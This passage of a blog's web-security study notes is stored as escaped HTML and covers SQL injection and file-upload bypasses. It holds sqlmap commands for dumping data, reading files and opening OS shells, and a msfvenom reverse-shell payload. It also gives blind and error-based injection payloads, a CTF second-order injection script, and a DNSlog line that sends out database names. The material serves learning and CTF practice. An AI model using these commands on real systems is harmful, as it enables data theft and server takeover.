\u83b7\u53d6\u5f53\u524d\u7528\u6237\u540d\uff0c@@SERVERNAME \u83b7\u53d6\u670d\u52a1\u5668\u4e3b\u673a\u4fe1\u606f\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5176\u4f59\u67e5\u8be2\u8bed\u53e5\u4ee5\u53ca\u5176\u5b83\u6570\u636e\u5e93\u7684\u6ce8\u5165\uff0c\u5230\u7528\u65f6\u518d\u641c\u5427\uff0c\u53cd\u6b63\u90fd\u5927\u5dee\u4e0d\u5dee\uff0c\u4e00\u5ff5\u901a\u4e07\u6cd5\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-SQL\u6ce8\u5165-SQLMAP\u5de5\u5177<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5b66\u4e60\u53c2\u8003\u6587\u7ae0\uff1a<br><a href=\"https:\/\/www.cnblogs.com\/bmjoker\/p\/9326258.html\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"1. sqlmap\u8d85\u8be6\u7ec6\u7b14\u8bb0+\u601d\u7ef4\u5bfc\u56fe - bmjoker - \u535a\u5ba2\u56ed (cnblogs.com)  (opens in a new tab)\">1. sqlmap\u8d85\u8be6\u7ec6\u7b14\u8bb0+\u601d\u7ef4\u5bfc\u56fe &#8211; bmjoker &#8211; \u535a\u5ba2\u56ed (cnblogs.com) <\/a><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5acc\u8fd9\u7bc7\u6587\u7ae0\u592a\u957f\u4e5f\u53ef\u4ee5\u5e38\u770b\u4e00\u4e2a\u5b66\u957f\u7684\u603b\u7ed3\u6587\u7ae0\u91cc\u5173\u4e8esqlmap\u4f7f\u7528\u7684\u90e8\u5206\uff1a<br><a rel=\"noreferrer noopener\" aria-label=\"SQL\u6ce8\u5165\u4e00\u547d\u901a\u5173! \u2013 fushuling\u306eblog  (opens in a new tab)\" href=\"https:\/\/fushuling.com\/index.php\/2023\/04\/07\/sql%e6%b3%a8%e5%85%a5%e4%b8%80%e5%91%bd%e9%80%9a%e5%85%b3\/\" target=\"_blank\">SQL\u6ce8\u5165\u4e00\u547d\u901a\u5173! \u2013 fushuling\u306eblog <\/a><\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u4e0d\u652f\u6301\u5bf9Nosql\u6570\u636e\u5e93\u7684\u6ce8\u5165\uff0c\u9700\u8981\u53e6\u5916\u627e\u811a\u672c\u5de5\u5177\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5e38\u89c4\u6d41\u7a0b<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u6d4b\u8bd5\u662f\u5426\u5b58\u5728\u6ce8\u5165\u70b9<\/strong><br>sqlmap -u [\u76ee\u6807url(\u82e5\u6709GET\u6570\u636e\u5219\u5e26\u4e0a)]<br>sqlmap -r [\u6587\u4ef6\u540d]<br>\/\/<strong>\u7528\u4e8e\u7279\u5b9a\u8bbf\u95ee<\/strong>\uff08\u4f8b\u5982\u767b\u5165\u540e\u7684\u6ce8\u5165\u70b9\u6216\u5176\u5b83\u7279\u5b9a\u8bf7\u6c42\u5305\u7684\u6ce8\u5165\uff09\uff0c\u6293\u5305\u628a\u8bf7\u6c42\u5305\u653e\u8fdb\u6587\u4ef6\u91cc\uff0c\u53ef\u7528&#8217;*&#8217;\u6807\u8bb0\u6ce8\u5165\u70b9<br><strong>\u6e05\u9664\u7f13\u5b58<\/strong><br>sqlmap -u [url] &#8211;purge<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u5224\u65ad\u6ce8\u5165\u70b9\u6743\u9650<\/strong><br>sqlmap -u [url] &#8211;privileges<br>\/\/\u82e5\u5b58\u5728\u9ad8\u6743\u9650\u6ce8\u5165\u5219\u53ef\u4ee5\u76f4\u63a5\u5c1d\u8bd5\u62ffShell<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u7206\u6570\u636e\u5e93\u540d<\/strong><br>sqlmap -u [url] &#8211;dba \/\/\u7206\u6240\u6709\u6570\u636e\u5e93\u540d<br>sqlmap -u [url] &#8211;current-db \/\/\u7206\u5f53\u524d\u6570\u636e\u5e93\u540d<br><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u7206\u8868\u540d<\/strong><br>sqlmap -u [url] &#8211;tables \/\/\u7206\u6240\u6709\u6570\u636e\u5e93\u7684\u6240\u6709\u8868<br>sqlmap -u [url] &#8211;tables -D [\u6570\u636e\u5e93\u540d] \/\/\u7206\u6307\u5b9a\u6570\u636e\u5e93\u7684\u8868\u540d<br><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u7206\u5217\u540d<\/strong><br>sqlmap -u [url]  &#8211;columns -T [\u8868\u540d] -D [\u6570\u636e\u5e93\u540d]<br><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u7206\u5185\u5bb9<\/strong><br>sqlmap -u [url] &#8211;dump -C [\u5217\u540d] -T [\u8868\u540d] -D [\u6570\u636e\u5e93\u540d] \/\/\u7206\u6307\u5b9a\u5217\u5185\u5bb9<br>sqlmap -u [url] &#8211;dump -T [\u8868\u540d] -D[\u6570\u636e\u5e93\u540d] \/\/\u7206\u6307\u5b9a\u8868\u5168\u90e8\u5185\u5bb9<br><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u82e5\u5b58\u5728\u9ad8\u6743\u9650\u6ce8\u5165\u4e14\u652f\u6301\u8bfb\u5199\u64cd\u4f5c\u548c\u6267\u884c\uff0c\u5219\u5c1d\u8bd5\u62ffShell<\/strong><br>sqlmap -u [url] &#8211;os \/\/\u8bc6\u522b\u7cfb\u7edf<br><br>sqlmap -u [url] &#8211;file-read [\u6587\u4ef6\u8def\u5f84] \/\/\u8bfb\u53d6\u6587\u4ef6<br>\u5c06\u672c\u5730\u7684test.txt\u5185\u5bb9\u5199\u5230\u76ee\u6807\u76841.txt<br>sqlmap -u [url] &#8211;file-write d:\/test\/test.txt &#8211;file-dest \/var\/www\/html\/1.txt<br><br>sqlmap -u [url] &#8211;reg-read \/\/\u8bfb\u53d6win\u7cfb\u7edf\u6ce8\u518c\u8868<br><br>sqlmap -u [url] &#8211;os-cmd=[\u547d\u4ee4] \/\/\u6267\u884ccmd\u547d\u4ee4<br>sqlmap -u [url] &#8211;os-shell \/\/\u5f00\u542f\u7cfb\u7edf\u4ea4\u4e92shell<br>\/\/\u4e24\u79cd\u7684\u56de\u663e\u90fd\u53ef\u80fd\u6bd4\u8f83\u6162\uff0c\u6240\u4ee5\u8fd8\u662f\u5f39\u4e2ashell\u6bd4\u8f83\u65b9\u4fbf<br><br><strong>\u53cd\u5f39shell\u5230msf\u4e0a(\u9700\u8981\u5148\u4ecemsf\u521b\u5efa\u4e00\u4e2aShell\u540e\u95e8\uff1amsfvenom -p windows\/meterpreter\/reverse_http |host=[\u672c\u673aip]|port=[\u8bbe\u5b9a\u7aef\u53e3] -f exe -o sql.exe\uff09<\/strong><br>sqlmap -u [url] &#8211;os-pwn &#8211;msf-path=[\u8bbf\u95eemsf\u540e\u95e8\u5b58\u653e\u7684\u8def\u5f84]<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Tamper\u811a\u672c<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">\u4e0d\u540c\u6570\u636e\u4f20\u8f93\u7c7b\u578b\u7684\u624b\u6ce8\u59ff\u52bf<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u6570\u5b57\u578b\u8bed\u53e5<\/strong>\uff1a<br>select * from xxx where id=$i<br>\u6ce8\u5165\uff1a?id=1 union select&#8230;&#8211;+<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u5b57\u7b26\u578b\u8bed\u53e5<\/strong>\uff1a<br>select * from xxx where name=&#8217;$s&#8217;<br>\u6ce8\u5165\uff1a?name=test&#8217; order by 4&#8211;+ \/\/\u95ed\u5408\u6389\u7b26\u53f7&#8217;<br><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u641c\u7d22\u578b\u8bed\u53e5<\/strong>\uff1a<br>select * from xxx where name like &#8216;%$s%&#8217;<br>\u6ce8\u5165\uff1a?search=test%&#8217; union select&#8230;and &#8216;%&#8217; =&#8217; \/\/\u95ed\u5408\u6389&#8217;%\u7136\u540e\u7528and\u8bed\u53e5\u6bd4\u8f83\u539f\u8bed\u53e5\u7684%&#8217;\u4f7f\u5176\u4e0d\u5f71\u54cd\u6ce8\u5165\u8bed\u53e5\u7684\u6267\u884c<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u683c\u5f0f\u5316\uff08\u8868\u5355\uff09\u8bed\u53e5<\/strong>\uff1a<br>select * from users where username='{$username}&#8217;<br>\u6ce8\u5165\uff1ajson={&#8220;username&#8221;:&#8221;admin&#8217; and 1=2 union select &#8230;.#&#8221;}<br>\/\/$username\u53ea\u4ece\u952e\u503c\u4e2d\u53d6\uff0c\u6240\u4ee5\u4e0d\u9700\u8981\u95ed\u5408admin\u524d\u9762\u7684&#8221;<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">Tamper\u811a\u672c<\/h5>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u6709\u65f6\u5019\u4f1a\u51fa\u73b0\u7f16\u7801\uff08base64\uff09\u751a\u81f3\u52a0\u5bc6\u3001\u683c\u5f0f\u5316\uff08json\uff09\u6765\u4f20\u8f93\u6570\u636e\uff0c\u76f4\u63a5\u7528sqlmap\u53ef\u80fd\u65e0\u6cd5\u6b63\u786e\u8bc6\u522b\u6ce8\u5165\u70b9\uff0c\u6240\u4ee5\u53ef\u4ee5\u7528sqlmap\u914d\u5408\u81ea\u5e26\u7684<strong>Tamper\u811a\u672c<\/strong>\u6765\u8fdb\u884c\u6ce8\u5165\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u4e0d\u540c\u7684\u6570\u636e\u5e93\u3001\u6570\u636e\u7c7b\u578b\u7528\u4e0d\u540c\u811a\u672c\uff0c\u800c\u811a\u672c\u5de5\u5177\u4e0d\u4f1a\u81ea\u52a8\u5224\u65ad\u6570\u636e\u7684\u7c7b\u578b\u3001\u683c\u5f0f\uff0c\u6240\u4ee5\u8fd8\u662f\u8981\u7ec3\u597d\u624b\u6ce8\uff0c\u624d\u80fd\u4eba\u5de5\u5224\u65ad\u597d\u6570\u636e\u7684\u7c7b\u578b\uff0c\u4e0d\u7136sqlmap\u4e5f\u6ca1\u6cd5\u7528\u597d\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u7528\u6cd5-\u7528base64\u4e3e\u4f8b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u &#91;url] --tamper=base64encode.py \/\/\u5c06payload\u8fdb\u884c\u7f16\u7801<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5176\u4f59\u811a\u672c\u53ef\u4ee5\u5728sqlmap\u76ee\u5f55\u4e0b\u7684tamper\u76ee\u5f55\u67e5\u627e\uff0c\u5bf9\u5e94\u7528\u6cd5\u53ef\u4ee5\u767e\u5ea6\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u6709\u4e9b\u7f51\u7ad9\u4f1a\u5bf9\u4e00\u4e9b\u7b26\u53f7\u8fdb\u884c\u8f6c\u4e49\uff0c\u4f7f\u6211\u4eec\u7684\u6ce8\u5165\u6ca1\u6cd5\u5b9e\u73b0\u95ed\u5408\u3002\u624b\u6ce8\u53ef\u4ee5\u5c1d\u8bd5\u5bbd\u5b57\u8282\u6ce8\u5165\uff1a\u5728\u4f1a\u88ab\u8f6c\u4e49\u7684\u5b57\u7b26\u524d\u52a0\u4e0a<strong>%df<\/strong>\uff1bsqlmap\u53ef\u4ee5\u4f7f\u7528Tamper\u811a\u672c\uff1a&#8211;tamper=unmagicquotes.py<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u5b66\u8fc7python\u4e86\u5c31\u53ef\u4ee5\u81ea\u5df1\u5c1d\u8bd5\u4fee\u6539\u751a\u81f3\u5199\u811a\u672c\u4e86\uff0c\u786e\u5b9e\u4e0d\u96be\uff0c\u52aa\u529b\u8d70\u51fa\u8212\u9002\u5708\uff0c\u4e0d\u80fd\u53ea\u7518\u5f53\u4e2a\u811a\u672c\u5c0f\u5b50\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4e0d\u540c\u7684\u8bf7\u6c42\u65b9\u5f0f<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u4e0d\u540c\u7684\u8bf7\u6c42\u65b9\u5f0f\u3001\u6570\u636e\u63d0\u4ea4\u65b9\u5f0f\u3001\u8bed\u8a00\u5bf9\u5e94\u4e0d\u540c\u7684\u6ce8\u5165\u65b9\u5f0f\u3002\u624b\u5de5\u6ce8\u5165\u5219\u4fee\u6539\u5bf9\u5e94\u7684\u6ce8\u5165\u70b9\u6bd4\u5982POST\u8bf7\u6c42\u5305\u7684Body\u6216Cookie\uff0c\u7528sqlmap\u5219\u4fee\u6539\u53c2\u6570\u6bd4\u5982\uff1asqlmap -u [url] &#8211;data &#8220;name=admin&amp;password=test&#8221;\uff08\u4ee5post\u65b9\u5f0f\u63d0\u4ea4\u6570\u636e\uff09\uff0c\u6216\u8005\u76f4\u63a5\u7528-<strong>r\u914d\u7f6e\u6570\u636e\u5305<\/strong>\u6765\u8dd1\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-9c4d991798d33f40ca5a161ea6b18cf2\">\u5728HTTP\u5305\u4e2d\u6709\u4e9b\u53c2\u6570\u53ef\u80fd\u4f1a\u88ab\u540e\u53f0\u63a5\u6536\u3001\u89e3\u6790\u6267\u884c\uff08\u4f8b\u5982XFF\u653b\u51fb\uff1aX-Forwarded-For\uff09\uff0c\u6240\u4ee5\u4e5f\u53ef\u80fd\u5b58\u5728\u6ce8\u5165\uff0c\u9700\u51ed\u56de\u663e\u548c\u81ea\u5df1\u7684\u7ecf\u9a8c\uff08\u767d\u76d2\u6d4b\u8bd5\u5ba1\u8ba1\u4ee3\u7801\u5f97\u6765\u7684\u7ecf\u9a8c\uff09\u6765\u8fdb\u884c\u5224\u65ad\u662f\u5426\u5b58\u5728\u6ce8\u5165\u70b9\u751a\u81f3\u662f\u731c\u89e3\u540e\u53f0\u5b58\u5728\u6ce8\u5165\u7684\u53c2\u6570\u540d\uff08\u9ed1\u76d2\u6d4b\u8bd5\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ac0dc15a581046d27ec254d8a3baace9\">\u603b\u7ed3\u8d77\u6765\u7684\u601d\u8def\uff1aGET&amp;POST&amp;COOKIE&amp;SERVER\uff08HTTP\u5305\u76f8\u5173\uff09\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-SQL\u6ce8\u5165-\u76f2\u6ce8\u653b\u51fb<\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color has-link-color wp-elements-9015ad5bdfe061596fa3361e07ba0019\">PS.\u901a\u5e38\u5728\u624b\u6ce8\u65f6\u7528\u76f2\u6ce8\u653b\u51fb\u6765\u731c\u89e3\u6570\u636e\u662f\u5f88\u8017\u8d39\u65f6\u95f4\u7684\uff0c\u6240\u4ee5\u5927\u90e8\u5206\u5b9e\u9645\u6d4b\u8bd5\u662f\u5229\u7528sqlmap\u6765\u8dd1\u6216\u81ea\u5df1\u7f16\u5199\u811a\u672c\u6765\u8fdb\u884c\u7206\u7834\u731c\u89e3\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5e03\u5c14\u76f2\u6ce8<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-80b2f0531a0afc976d7f615b51b323e1\">\u57fa\u4e8e\u5e03\u5c14\u7684SQL\u76f2\u6ce8-\u903b\u8f91\u5224\u65ad\uff0c\u9700\u8981\u6709\u6570\u636e\u5e93\u8f93\u51fa\u8fdb\u884c\u5224\u65ad\u3002\u5e38\u7528\u51fd\u6570\uff1aregexp,like,ascii,left,ord,mid\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-4715c0bda10c0a935dd0aafd1a9de43d\">\u4f8b\u5982\u5229\u7528left\u51fd\u6570\uff1a?id=1 and left(database(),2)=&#8217;ss&#8217;\uff1b\u5224\u65ad\u6570\u636e\u5e93\u540d\u524d\u4e24\u4f4d\u5b57\u7b26\u662f\u5426\u662f&#8221;ss&#8221;\uff0c\u82e5\u662f\u5219\u4f1a\u6709\u6b63\u786e\u7684\u56de\u663e\uff0c\u501f\u6b64\u56de\u663e\u9010\u6b65\u731c\u89e3\u6570\u636e\u5e93\u4fe1\u606f\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5ef6\u65f6\u6ce8\u5165<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-741fa2e6b91588d8aea37daa8a91e7d8\">\u57fa\u4e8e\u65f6\u95f4\u7684SQL\u76f2\u6ce8-\u5ef6\u65f6\u5224\u65ad\uff0c\u4e0d\u9700\u8981\u8f93\u51fa\u56de\u663e\u5c31\u80fd\u5224\u65ad\uff0c\u5e38\u7528\u51fd\u6570\uff1aif,sleep\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-afccfb9b83f1d56d94ff2b34111f40c2\">\u4f8b\u5b50-\u5229\u7528if,sleep\u51fd\u6570\uff1a?id=1 and if(length(database())=7,sleep(5),0)\uff1b\u8fd9\u662f\u4e00\u4e2a<strong>\u4e09\u76ee\u8fd0\u7b97<\/strong>\uff0c\u501f\u52a9Bp\u6293\u5305\u5f97\u5230\u7684\u54cd\u5e94\u65f6\u95f4\u5224\u65ad\u731c\u89e3\u662f\u5426\u6b63\u786e\uff0c\u82e5\u6709\u53d1\u751f\u5ef6\u65f6\u5219\u8bf4\u660e\u6761\u4ef6\u5224\u65ad\u4e3a\u6b63\u786e\uff0c\u82e5\u6ca1\u6709\u5ef6\u65f6\u5219\u8bf4\u660e\u8fd4\u56de\u4e860\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u62a5\u9519\u6ce8\u5165<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-3c15f7f9e10ee7b013e3efb69ca431d4\">\u6f0f\u6d1e\u4ea7\u751f\u7684\u539f\u7406\uff1a$result=mysql_query($sql,$conn) or die(mysql_error())\uff1b\u82e5mysql_query\u51fd\u6570\u6267\u884csql\u8bed\u53e5\u53d1\u751f\u9519\u8bef\uff0c\u5219\u4f1a\u8fdb\u884c\u62a5\u9519\u5e76\u8fd4\u56de\u9884\u5148\u8bbe\u5b9a\u597d\u7684\u62a5\u9519\u9875\u9762\uff08mysql_error\u51fd\u6570\uff09\u3002\u9700\u8981\u6709\u6570\u636e\u5e93\u62a5\u9519\u5904\u7406\u6765\u8fdb\u884c\u5224\u65ad\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-811157426525ab7bccbbdbd692ecd274\">\u5e38\u7528\u51fd\u6570\uff1afloor,updatexml,extractvalue\u3002<\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-link-color wp-elements-89e2c76ff42842e1c4a73e9b1b9ab8bb\">updatexml\u4f8b\u5b50\uff1a?id=1 and updatexml(1,concat(0x7e,(select @@version),0x7e),1)\uff1b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-SQL\u6ce8\u5165-\u5176\u4ed6\u6ce8\u5165<\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color has-link-color wp-elements-bc8712a52b24e758b8ce41c424a8dd44\">\u7b80\u5355\u63d0\u4e00\u4e0b\u5176\u4ed6\u7c7b\u578b\u7684\u6ce8\u5165\uff0c\u4f46\u9650\u4e8e\u5229\u7528\u6761\u4ef6\u4e25\u82db\u548c\u6548\u679c\u6709\u9650\uff0c\u6bd4\u8f83\u9e21\u808b\u548c\u5c11\u89c1\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5806\u53e0\u6ce8\u5165<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ca7dac14192e3cb7fe427ddc9d914b19\">\u5e38\u89c1\u652f\u6301\u5806\u53e0\u6ce8\u5165\u7684\u6570\u636e\u5e93\u7c7b\u578b\uff1aMySQL\u3001MSSQL\u3001Postgresql\u7b49\uff08\u6839\u636e\u6570\u636e\u5e93\u662f\u5426\u652f\u6301\u591a\u6761\u8bed\u53e5\u6267\u884c\u6765\u5224\u65ad\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-e3fe7414f5b4f99a5c01ad5ab751c025\">\u8bed\u53e5\uff1aselect * from news where id=1;create table test like news\uff1b\u5229\u7528\u5206\u53f7\u62fc\u63a5\u4e00\u6761\u65b0\u7684sql\u8bed\u53e5\u5e76\u6267\u884c\u3002\u5b9e\u9645\u6ce8\u5165\u4e2d\u9700\u8981\u4e00\u5b9a\u6761\u4ef6\uff0c\u4e0d\u4e00\u5b9a\u80fd\u5b9e\u73b0\u5806\u53e0\u6ce8\u5165\u3002<\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-link-color wp-elements-acc698c6cc0e85629b9ccd3c382f0512\">\u7ec3\u4e60\u6848\u4f8b\uff1a\u5f3a\u7f51\u676f2019-\u968f\u4fbf\u6ce8\u3002payload\uff1a&#8217;;set @a=xxxxxxx(\u4e3a\u4e86\u7ed5\u8fc7\u8fc7\u6ee4\u6240\u4ee5\u5c06\u8bed\u53e5\u8fdb\u884chex\u7f16\u7801\u5f97\u5230xxxxxxx);prepare execsql from @a;execute execsql;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4e8c\u6b21\u6ce8\u5165<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-4ce40d3ef619a92b71fd9d9e92f1ea75\">\u539f\u7406\uff1a<strong>\u7b2c\u4e00\u6b65<\/strong>\uff0c\u5bf9\u6570\u636e\u5e93\u8fdb\u884c\u63d2\u5165\u6570\u636e\uff0c\u540e\u53f0\u4ec5\u5bf9\u8bed\u53e5\u4e2d\u7684\u7279\u6b8a\u5b57\u7b26\u8fdb\u884c\u8f6c\u4e49\uff0c\u4f46\u5199\u5165\u6570\u636e\u5e93\u65f6\u4e0d\u4f1a\u5bf9\u539f\u8bed\u53e5\u505a\u4fee\u6539\uff08\u6ca1\u6709\u4fdd\u7559\u8f6c\u4e49\u7b26\uff09\uff0c\u800c\u539f\u8bed\u53e5\u4e2d\u5305\u542b\u6076\u610f\u64cd\u4f5c\uff1b<strong>\u7b2c\u4e8c\u6b65<\/strong>\uff0c\u67e5\u8be2\u5148\u524d\u6ce8\u5165\u7684\u6570\u636e\uff0c\u8ba9\u540e\u53f0\u4ece\u6570\u636e\u5e93\u4e2d\u53d6\u51fa\u6076\u610f\u8bed\u53e5\u5e76\u89e3\u6790\u6267\u884c\uff08\u6761\u4ef6\uff1a\u4ee3\u7801\u5f00\u53d1\u4e2d\u8ba4\u4e3a\u4ece\u6570\u636e\u5e93\u53d6\u51fa\u7684\u6570\u636e\u662f\u5b89\u5168\u53ef\u4fe1\u7684\u4e8e\u662f\u4e0d\u505a\u8fdb\u4e00\u6b65\u7684\u68c0\u9a8c\u5904\u7406\uff09\u4ece\u800c\u5b9e\u73b0\u6ce8\u5165\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-188535b9c7d2a901157a4b667824f9ab\">\u4f8b\u5b50-\u540e\u53f0\u6267\u884c\u4fee\u6539\u5bc6\u7801\u64cd\u4f5c\uff1aupdate user set password=&#8217;test&#8217; where username='[sql\u6ce8\u5165\u8bed\u53e5]&#8217;\uff1b\u6ce8\u518c\u65f6\u5c06\u7528\u6237\u540d\u8bbe\u7f6e\u4e3asql\u6ce8\u5165\u8bed\u53e5\uff0c\u56e0\u5b58\u5728\u8f6c\u4e49\u800c\u65e0\u6cd5\u6267\u884c\u6ce8\u5165\uff0c\u4f46\u901a\u8fc7\u4e8c\u6b21\u6ce8\u5165\u5c06\u7528\u6237\u540d\uff08sql\u6ce8\u5165\u8bed\u53e5\uff09\u62fc\u63a5\u5230\u4fee\u6539\u64cd\u4f5c\u4e2d\u4ece\u800c\u6267\u884csql\u6ce8\u5165\u3002<\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-link-color wp-elements-b58806482f83c67bd81ea621786886c9\">\u7ec3\u4e60\u6848\u4f8b\uff1a\u7f51\u9f0e\u676f2018-Unfinish\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\n#\u7f51\u9f0e\u676f2018-Unfinish\u4e8c\u6b21\u6ce8\u5165\u811a\u672c\nimport requests\nimport re\nfrom time import sleep\nfrom bs4 import BeautifulSoup\n \n \ndef flag():\n    flag = ''\n    url = '&#91;url]'\n    url1 = url + 'register.php'\n    url2 = url + 'login.php'\n    for i in range(1, 100):\n        sleep(0.5)\n        data_register = {\"email\": f\"a{i}@163.com\",\n                 \"username\": f\"0'+ascii(substr((select * from flag) from {i} for 1))+'0;\", \"password\": \"1\"}\n        data_login = {\"email\": f\"a{i}@163.com\", \"password\": \"1\"}\n        response_regiseter = requests.post(url1, data=data_register)\n        response_login = requests.post(url2, data=data_login)\n        bs = BeautifulSoup(response_login.text, 'html.parser')  # bs4\u89e3\u6790\u9875\u9762\n        username = bs.find('span', class_='user-name')  # \u53d6\u8fd4\u56de\u9875\u9762\u6570\u636e\u7684span class=user-name\u5c5e\u6027\n        number = username.text  # \u53d6\u8be5\u5c5e\u6027\u7684\u6570\u5b57\n        flag += chr(int(number))\n        print(flag)\n\nflag()<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">DNSlog\u6ce8\u5165<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-da88e46878dcebbaaddca83d4c292cc8\">\u539f\u7406\uff1a\u63a7\u5236\u76ee\u6807\u5e26\u7740\u7279\u5b9a\u4fe1\u606f\uff08\u4e5f\u5c31\u662f\u6240\u8c13\u7684DNSlog\u5916\u5e26\uff09\u8bbf\u95eeDNSlog\u7f51\u7ad9\u4ece\u800c\u5728\u65e5\u5fd7\u4e2d\u7559\u4e0b\u7279\u5b9a\u4fe1\u606f\uff1b\u9700\u8981\u6709\u9ad8\u6743\u9650\u6ce8\u5165\u4ece\u800c\u80fd\u591f\u4f7f\u7528load_file\u51fd\u6570\uff08\u6240\u4ee5\u8bf4\u633a\u9e21\u808b\u7684\uff0c\u90fd\u6709\u9ad8\u6743\u9650\u90a3\u90fd\u76f4\u63a5\u62ffshell\u4e86\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-da266039c984903039c36ccabe61ae98\">\u4e3b\u8981\u7528\u4e8e\u89e3\u51b3\u65e0\u56de\u663e\u7684\u95ee\u9898\u3002<\/p>\n\n\n\n<p>\u8bed\u53e5\u4e3e\u4f8b\uff1aselect load_file(concat(&#8216;\/\/&#8217;,(select database()),&#8217;.je5i3a.dnslog.cn\/1.txt&#8217;))\uff1b<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-4fd7dc62cd787bf300f7cd53f2ddf4a8\">\u5176\u5b83\u5916\u5e26\u6ce8\u5165\u8bed\u53e5\u53ef\u5728\u7f51\u4e0a\u627e\uff0c\u4e0d\u591a\u8d58\u8ff0\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u5341\u5929\uff1aWEB\u653b\u9632-\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u68c0\u6d4b\u5c42\u9762\uff1a\u524d\u7aef\u68c0\u6d4b\uff0c\u540e\u7aef\u68c0\u6d4b<\/li>\n\n\n\n<li>\u68c0\u6d4b\u5185\u5bb9\uff1a\u6587\u4ef6\u5934(\u52a0\u4e2aGIF89a)\uff0c\u5b8c\u6574\u6027\uff0c\u4e8c\u6b21\u6e32\u67d3<\/li>\n\n\n\n<li>\u68c0\u6d4b\u540e\u7f00\uff1a\u9ed1\u540d\u5355\uff0c\u767d\u540d\u5355\uff0cMIME\u68c0\u6d4b<\/li>\n\n\n\n<li>\u7ed5\u8fc7\u6280\u5de7\uff1a\u591a\u540e\u7f00\u540d\u89e3\u6790(php3,php5,phtml)\uff0c\u622a\u65ad\uff0c\u4e2d\u95f4\u4ef6\u7279\u6027\uff08\u89e3\u6790\u6f0f\u6d1e\uff09\uff0c\u6761\u4ef6\u7ade\u4e89<\/li>\n<\/ul>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-b8ddfb8e6d585db895cf8286950901fc\">\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u7684\u76ee\u6807\u662f\u914d\u5408\u5176\u5b83\u6f0f\u6d1e\u6216\u8005\u4f20\u9a6c\u62ffshell\uff08\u6700\u559c\u6b22\u4f20\u9a6c\u4e86\u634f\uff09\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">JS\u9a8c\u8bc1+MIME<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color 